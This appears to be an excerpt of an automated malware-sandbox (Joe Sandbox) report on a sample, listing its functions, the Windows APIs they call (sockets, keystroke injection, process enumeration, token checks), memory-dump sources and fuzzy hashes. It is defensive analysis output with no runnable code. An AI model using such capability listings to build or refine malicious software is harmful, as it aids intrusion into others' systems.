                                    • Instruction Fuzzy Hash: 6E510774A00209AFDF10DF68D884AEE7BB9FF45364F108169F865DB2A0E770AD91CB50
                                    Function 00801AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00801AFD
                                    • WSAGetLastError.WSOCK32 ref: 00801B0B
                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00801B8A
                                    • WSAGetLastError.WSOCK32 ref: 00801B94
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorLast$socket
                                    • String ID:
                                    • API String ID: 1881357543-0
                                    • Opcode ID: b68f74f2c89b1e376b4a5bcb88d0514bdd34c1a5c53c2c88fe0b269fb7f3cd3d
                                    • Instruction ID: 75c1255977ea0793286751565f1b6743bb4432e9a4fd53b7fc9197feced57997
                                    • Opcode Fuzzy Hash: b68f74f2c89b1e376b4a5bcb88d0514bdd34c1a5c53c2c88fe0b269fb7f3cd3d
                                    • Instruction Fuzzy Hash: 2841BF34640200AFEB20AF24D88AF2977E5EF44728F548498FA1A9F6D2D776DD41CB90
                                    Function 007BB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0f583865cbeb9fed7a7b62633a6cdc751c1f756534117c18dd21b9813c4b0625
                                    • Instruction ID: b7c8802d41c34125f1579d22290c9e1863459b6829362da8c701d63bb7d233c1
                                    • Opcode Fuzzy Hash: 0f583865cbeb9fed7a7b62633a6cdc751c1f756534117c18dd21b9813c4b0625
                                    • Instruction Fuzzy Hash: 99410872A00744FFD7249F78CC45BAABBA9FF89710F10462EF945DB282D7B999418780
                                    Function 007F56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007F5783
                                    • GetLastError.KERNEL32(?,00000000), ref: 007F57A9
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007F57CE
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007F57FA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    • Opcode ID: 68d2538b550ab8db8d9aeb1af7f4302919f9b17c5f4df63fbced5832c2f5a047
                                    • Instruction ID: 87f7970ea38e7dcb13e740a6f327169193e40be66e8278b1991fe5ec2910f74d
                                    • Opcode Fuzzy Hash: 68d2538b550ab8db8d9aeb1af7f4302919f9b17c5f4df63fbced5832c2f5a047
                                    • Instruction Fuzzy Hash: 24412F35600614DFCB15EF15C548A5DBBE2FF49720B19C488E95A5B362CB38FD40CBA1
                                    Function 007BD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,007A6D71,00000000,00000000,007A82D9,?,007A82D9,?,00000001,007A6D71,?,00000001,007A82D9,007A82D9), ref: 007BD910
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007BD999
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007BD9AB
                                    • __freea.LIBCMT ref: 007BD9B4
                                      • Part of subcall function 007B3820: RtlAllocateHeap.NTDLL(00000000,?,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6,?,00781129), ref: 007B3852
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                    • String ID:
                                    • API String ID: 2652629310-0
                                    • Opcode ID: c71b8e3e67bd05b3c42a9e7d25cbc6066a541e7f74f936a15c1af5406696f347
                                    • Instruction ID: 0bd1e4e34b7210e25ab7ba9b77c85c1358f381a553d58908284a7cfb32b3e15a
                                    • Opcode Fuzzy Hash: c71b8e3e67bd05b3c42a9e7d25cbc6066a541e7f74f936a15c1af5406696f347
                                    • Instruction Fuzzy Hash: B331BC72A0020AABDF249F65DC45EEE7BA9EF41310F054268FC04D7251EB39ED50CBA0
                                    Function 008152C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00815352
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00815375
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00815382
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008153A8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LongWindow$InvalidateMessageRectSend
                                    • String ID:
                                    • API String ID: 3340791633-0
                                    • Opcode ID: 0008ded3275cc3fd79f33b34f59af1cfa500bbbb636ef6182203b41903a0bf1e
                                    • Instruction ID: f5fa5c1d0aaffb7c43698bfb67eb3147523a2540e7580ff28682034edf39709d
                                    • Opcode Fuzzy Hash: 0008ded3275cc3fd79f33b34f59af1cfa500bbbb636ef6182203b41903a0bf1e
                                    • Instruction Fuzzy Hash: 2731C170A55A0CEFEF249A14CC15BE9776AFF86390F984106BA21D73E0C7B499C0AB41
                                    Function 007EAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 007EABF1
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 007EAC0D
                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 007EAC74
                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 007EACC6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 90bf05c12aa509be1587d237b36daad0e14096d8735b235b2cbd4c138e2a31c4
                                    • Instruction ID: 36d38ce3037db545d54f382790b199c3f6e73b85c95b8d289a9641e7e3e2fcfd
                                    • Opcode Fuzzy Hash: 90bf05c12aa509be1587d237b36daad0e14096d8735b235b2cbd4c138e2a31c4
                                    • Instruction Fuzzy Hash: F2312C30941398BFEF34CB668C047FA7B656F8D310F24431AE485561E0C37CA9858772
                                    Function 00817674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0081769A
                                    • GetWindowRect.USER32(?,?), ref: 00817710
                                    • PtInRect.USER32(?,?,00818B89), ref: 00817720
                                    • MessageBeep.USER32(00000000), ref: 0081778C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    • Opcode ID: c89bd9bc2c8be820e4ad5dc2fbcfaf105de25b4c3a72abd5303ebe20a8894a05
                                    • Instruction ID: 4300a10788bb2624b591fcb1798675567eef08b2024b7f90f90cfaaecf5891f7
                                    • Opcode Fuzzy Hash: c89bd9bc2c8be820e4ad5dc2fbcfaf105de25b4c3a72abd5303ebe20a8894a05
                                    • Instruction Fuzzy Hash: 2A417A74A092549FDB01CF58C898EE9BBF9FF49314F1585ACE815DB2A1C730A981CB90
                                    Function 008116DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 008116EB
                                      • Part of subcall function 007E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007E3A57
                                      • Part of subcall function 007E3A3D: GetCurrentThreadId.KERNEL32 ref: 007E3A5E
                                      • Part of subcall function 007E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007E25B3), ref: 007E3A65
                                    • GetCaretPos.USER32(?), ref: 008116FF
                                    • ClientToScreen.USER32(00000000,?), ref: 0081174C
                                    • GetForegroundWindow.USER32 ref: 00811752
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    • Opcode ID: 924bb8affa1231ad3e3d0640f49ec913177f92d4f2798f383e788182a0982bcb
                                    • Instruction ID: aef4f5b57cc0562d358efae5a90051e348c44fec3441e0c36556646252163639
                                    • Opcode Fuzzy Hash: 924bb8affa1231ad3e3d0640f49ec913177f92d4f2798f383e788182a0982bcb
                                    • Instruction Fuzzy Hash: 1E316D71D00148AFDB00EFAAC8898EEBBFDFF48304B1480A9E515E7251DA349E41CBA1
                                    Function 007ED4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 007ED501
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 007ED50F
                                    • Process32NextW.KERNEL32(00000000,?), ref: 007ED52F
                                    • CloseHandle.KERNEL32(00000000), ref: 007ED5DC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: adaba93fc3862352ef7a09cc59edbe22d180dbb19412a8179d2ea2ac92c39d15
                                    • Instruction ID: 85f83705113190c786eb4a0b801cc664711c4542b556f28199a924bfc8e33134
                                    • Opcode Fuzzy Hash: adaba93fc3862352ef7a09cc59edbe22d180dbb19412a8179d2ea2ac92c39d15
                                    • Instruction Fuzzy Hash: 5531C271048340EFD310EF54C889ABFBBF8EF99344F14092DF581821A1EB759948CBA2
                                    Function 00818FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    • GetCursorPos.USER32(?), ref: 00819001
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007D7711,?,?,?,?,?), ref: 00819016
                                    • GetCursorPos.USER32(?), ref: 0081905E
                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007D7711,?,?,?), ref: 00819094
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                    • String ID:
                                    • API String ID: 2864067406-0
                                    • Opcode ID: fb0d71a4f27f299ecc1160b8149b3f1e0309dd8bc8954cd22d8be4782c35d744
                                    • Instruction ID: d26670d0aa915203c7ca57a9670182066ec79238a1057e2bd2ddb7be28bae3cb
                                    • Opcode Fuzzy Hash: fb0d71a4f27f299ecc1160b8149b3f1e0309dd8bc8954cd22d8be4782c35d744
                                    • Instruction Fuzzy Hash: 9D217A35A00518EFDF25CF94C868EEA7BBEFF89361F044069F9458B261C335A990DB60
                                    Function 007ED2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNEL32(?,0081CB68), ref: 007ED2FB
                                    • GetLastError.KERNEL32 ref: 007ED30A
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 007ED319
                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0081CB68), ref: 007ED376
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                    • String ID:
                                    • API String ID: 2267087916-0
                                    • Opcode ID: 3c894a88e936ca35d67c52b8d0f4a46cd73419777f2d34e41c60f1d205a89109
                                    • Instruction ID: 2c5e5e1e524e3f7c32a504a55bf721fb4d8d53363efd190e859626140ac50607
                                    • Opcode Fuzzy Hash: 3c894a88e936ca35d67c52b8d0f4a46cd73419777f2d34e41c60f1d205a89109
                                    • Instruction Fuzzy Hash: 3F21807454A241DF8320EF29C8854AAB7E8FE59324F104A1DF4A9D72E1E734DD45CB93
                                    Function 007E1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007E102A
                                      • Part of subcall function 007E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007E1036
                                      • Part of subcall function 007E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007E1045
                                      • Part of subcall function 007E1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007E104C
                                      • Part of subcall function 007E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007E1062
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007E15BE
                                    • _memcmp.LIBVCRUNTIME ref: 007E15E1
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E1617
                                    • HeapFree.KERNEL32(00000000), ref: 007E161E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                    • String ID:
                                    • API String ID: 1592001646-0
                                    • Opcode ID: b6d163d249d0058dd9f95c35723df3e03cb20703aec204a258d1d4c957b14b5f
                                    • Instruction ID: 2f21a8f430dc12d3ba3b2ab9caa815d5e61debcc53cc83d41cb20482fb2d407a
                                    • Opcode Fuzzy Hash: b6d163d249d0058dd9f95c35723df3e03cb20703aec204a258d1d4c957b14b5f
                                    • Instruction Fuzzy Hash: CC21A131E41108EFDF00DFA5C946BEEB7B8FF48354F498459E445A7241EB34AA05CB90
                                    Function 00812782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0081280A
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00812824
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00812832
                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00812840
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Long$AttributesLayered
                                    • String ID:
                                    • API String ID: 2169480361-0
                                    • Opcode ID: 9a4715c551e4732830d8945f164f2e08b12912bb0c78d94d066fb0c3db6a89bf
                                    • Instruction ID: 9aeea3c6683466dbc29faa95fcca4a60288802c008da1253aeb026b43acc802f
                                    • Opcode Fuzzy Hash: 9a4715c551e4732830d8945f164f2e08b12912bb0c78d94d066fb0c3db6a89bf
                                    • Instruction Fuzzy Hash: 7E21C131244115AFD7149B24C844FEA7B99FF45328F148258F426CB6E2CB75FC92C790
                                    Function 007E78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,007E790A,?,000000FF,?,007E8754,00000000,?,0000001C,?,?), ref: 007E8D8C
                                      • Part of subcall function 007E8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 007E8DB2
                                      • Part of subcall function 007E8D7D: lstrcmpiW.KERNEL32(00000000,?,007E790A,?,000000FF,?,007E8754,00000000,?,0000001C,?,?), ref: 007E8DE3
                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,007E8754,00000000,?,0000001C,?,?,00000000), ref: 007E7923
                                    • lstrcpyW.KERNEL32(00000000,?), ref: 007E7949
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,007E8754,00000000,?,0000001C,?,?,00000000), ref: 007E7984
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    • Opcode ID: 27b7fcd43fcb5bf7c3c33c354e136741a956fbacb2fef115132d1eae6e834569
                                    • Instruction ID: ab0f1e2995d3eef1ce10622adbf41379f84ad6e25cd1f083500644f01c6ca82e
                                    • Opcode Fuzzy Hash: 27b7fcd43fcb5bf7c3c33c354e136741a956fbacb2fef115132d1eae6e834569
                                    • Instruction Fuzzy Hash: 8611E93A201381ABCB159F35DC45E7A77A9FF49350B50802AF946C7365EB359811C751
                                    Function 00817CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00817D0B
                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00817D2A
                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00817D42
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007FB7AD,00000000), ref: 00817D6B
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID:
                                    • API String ID: 847901565-0
                                    • Opcode ID: 3662c47f33d8be6e12167d37b0d4060e843698fa615c94bdfcd03881d76964d0
                                    • Instruction ID: 750109299f6443da1b6d93893a84fff5aab4b76666b41fc08a0c374eb77f99ec
                                    • Opcode Fuzzy Hash: 3662c47f33d8be6e12167d37b0d4060e843698fa615c94bdfcd03881d76964d0
                                    • Instruction Fuzzy Hash: 62119D31605619AFCB109F28EC08AE63BA9FF453A5B158728F839C72F0D7309990CB90
                                    Function 00815660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 008156BB
                                    • _wcslen.LIBCMT ref: 008156CD
                                    • _wcslen.LIBCMT ref: 008156D8
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00815816
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
